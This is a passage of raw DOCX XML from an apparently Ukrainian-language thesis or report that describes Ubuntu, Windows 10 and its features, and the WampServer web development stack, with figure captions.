          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. і сотень компаній по всьому світу</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C39162" w14:textId="1131D4D3" w:rsidR="00FD3159" w:rsidRDefault="00FD3159" w:rsidP="00FD3159">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> включає найкращі переклади та засоби доступності для людей з обмеженими можливостями, які тільки існують у вигляді відкритого ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007679D8" w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> [38]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5447F17C" w14:textId="12F8FCE5" w:rsidR="00CA572F" w:rsidRDefault="00CA572F" w:rsidP="00CA572F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750A935D" w14:textId="09BEE438" w:rsidR="00CA572F" w:rsidRDefault="00CA572F" w:rsidP="00CA572F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EB0B6F0" wp14:editId="65768AB4">
            <wp:extent cx="6120130" cy="3824605"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="18" name="Рисунок 18" descr="Официальный релиз Ubuntu 16.04 LTS (Xenial Xerus). Что нов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фициальный релиз Ubuntu 16.04 LTS (Xenial Xerus). Что нового"/>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3824605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19019F84" w14:textId="42723E7B" w:rsidR="00CA572F" w:rsidRDefault="00CA572F" w:rsidP="00CA572F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис. 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA572F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VMware Workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B42C6" w14:textId="77777777" w:rsidR="00FD3159" w:rsidRPr="00CA572F" w:rsidRDefault="00FD3159" w:rsidP="00ED2EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CC7F0B" w14:textId="3E0D2783" w:rsidR="00FD3159" w:rsidRDefault="00FD3159" w:rsidP="00FD3159">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc30433156"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.2.</w:t>
      </w:r>
      <w:r w:rsidR="00A846AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Описання</w:t>
      </w:r>
      <w:r w:rsidR="00543E7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00543E7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Windows 10</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w14:paraId="0A6B747F" w14:textId="5760DA5E" w:rsidR="00543E7D" w:rsidRDefault="00543E7D" w:rsidP="00543E7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F2F734" w14:textId="69E80703" w:rsidR="00A846AF" w:rsidRDefault="00543E7D" w:rsidP="00274B2E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EBE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED2EBE" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(рис. 3.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EBE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EBE" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidRPr="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> від компанії </w:t>
      </w:r>
      <w:r w:rsidRPr="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00274B2E" w:rsidRPr="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>для ноут</w:t>
      </w:r>
      <w:r w:rsidR="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>буків</w:t>
      </w:r>
      <w:r w:rsidR="00274B2E" w:rsidRPr="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>персональних комп’ютерів</w:t>
      </w:r>
      <w:r w:rsidR="00274B2E" w:rsidRPr="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, планшетів, лептопів-трансформерів і мобільних пристроїв(смартфонів).</w:t>
      </w:r>
      <w:r w:rsidR="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Оформлення </w:t>
      </w:r>
      <w:r w:rsidR="00274B2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00274B2E" w:rsidRPr="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r w:rsidR="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">заснований на принципах дизайну ім’я якому </w:t>
      </w:r>
      <w:r w:rsidR="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Metro</w:t>
      </w:r>
      <w:r w:rsidR="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, для якого притаманні, крупні шрифти, плавні ефекти переходів, схематичні іконки та одноколірні прямокутні форми. Також додано новий функціонал</w:t>
      </w:r>
      <w:r w:rsidR="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFABCA9" w14:textId="4DB7EAD4" w:rsidR="00614A79" w:rsidRPr="00A846AF" w:rsidRDefault="00A846AF" w:rsidP="00A846AF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Cortana – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>особистий помічник;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B894DE" w14:textId="28AE4D86" w:rsidR="00A846AF" w:rsidRPr="00A846AF" w:rsidRDefault="00A846AF" w:rsidP="00A846AF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual Smart Cards – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>двофакторна авторизація;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E0CBDF" w14:textId="6D1AEFD1" w:rsidR="00A846AF" w:rsidRPr="00A846AF" w:rsidRDefault="00A846AF" w:rsidP="00A846AF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Azure Active Directory – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>хмарна активна директорія;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6F2368" w14:textId="63368339" w:rsidR="00A846AF" w:rsidRPr="005027FB" w:rsidRDefault="00A846AF" w:rsidP="00A846AF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Hyper</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>– система віртуалізації на основі гіпервізора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5512D9" w14:textId="0726ED85" w:rsidR="00CA572F" w:rsidRPr="005027FB" w:rsidRDefault="00CA572F" w:rsidP="00CA572F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B72C8F3" w14:textId="5D58DAF4" w:rsidR="00CA572F" w:rsidRDefault="00CA572F" w:rsidP="00ED2EBE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="247130F2" wp14:editId="178C81F3">
            <wp:extent cx="6120130" cy="3441700"/>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3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0897CA67" w14:textId="2F359236" w:rsidR="00ED2EBE" w:rsidRPr="00ED2EBE" w:rsidRDefault="00ED2EBE" w:rsidP="00ED2EBE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис. 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5 Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077A0A23" w14:textId="3003C1EF" w:rsidR="00FD3159" w:rsidRPr="00ED2EBE" w:rsidRDefault="00FD3159" w:rsidP="00ED2EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B37E52D" w14:textId="1B0B554E" w:rsidR="00A846AF" w:rsidRDefault="00A846AF" w:rsidP="00A846AF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc30433157"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Описання </w:t>
      </w:r>
      <w:r w:rsidRPr="00A846AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>WampServer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="1CD45E97" w14:textId="1A3D84C0" w:rsidR="00A846AF" w:rsidRDefault="00A846AF" w:rsidP="00A846AF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="451A6E93" w14:textId="16315191" w:rsidR="00A846AF" w:rsidRPr="005B4CE1" w:rsidRDefault="00A846AF" w:rsidP="00A846AF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WampServer</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EBE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED2EBE" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EBE" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>рис</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EBE" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>. 3.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EBE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EBE" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> це платформа для веб-розробки під Windows для динамічних веб-додатків за допомогою сервера Apache2, інтерпретатора скриптів PHP і бази даних </w:t>
      </w:r>
      <w:r w:rsidRPr="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. У нього також входить веб-додаток </w:t>
      </w:r>
      <w:r w:rsidRPr="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PHPMyAdmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> для найбільш прост</w:t>
      </w:r>
      <w:r w:rsidR="00E10BF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>орої</w:t>
      </w:r>
      <w:r w:rsidRPr="00A846AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> обробки баз даних.</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> [39]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316E4052" w14:textId="0BCD5E11" w:rsidR="00E10BF3" w:rsidRDefault="00E10BF3" w:rsidP="00A846AF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EBE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WampServer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10BF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
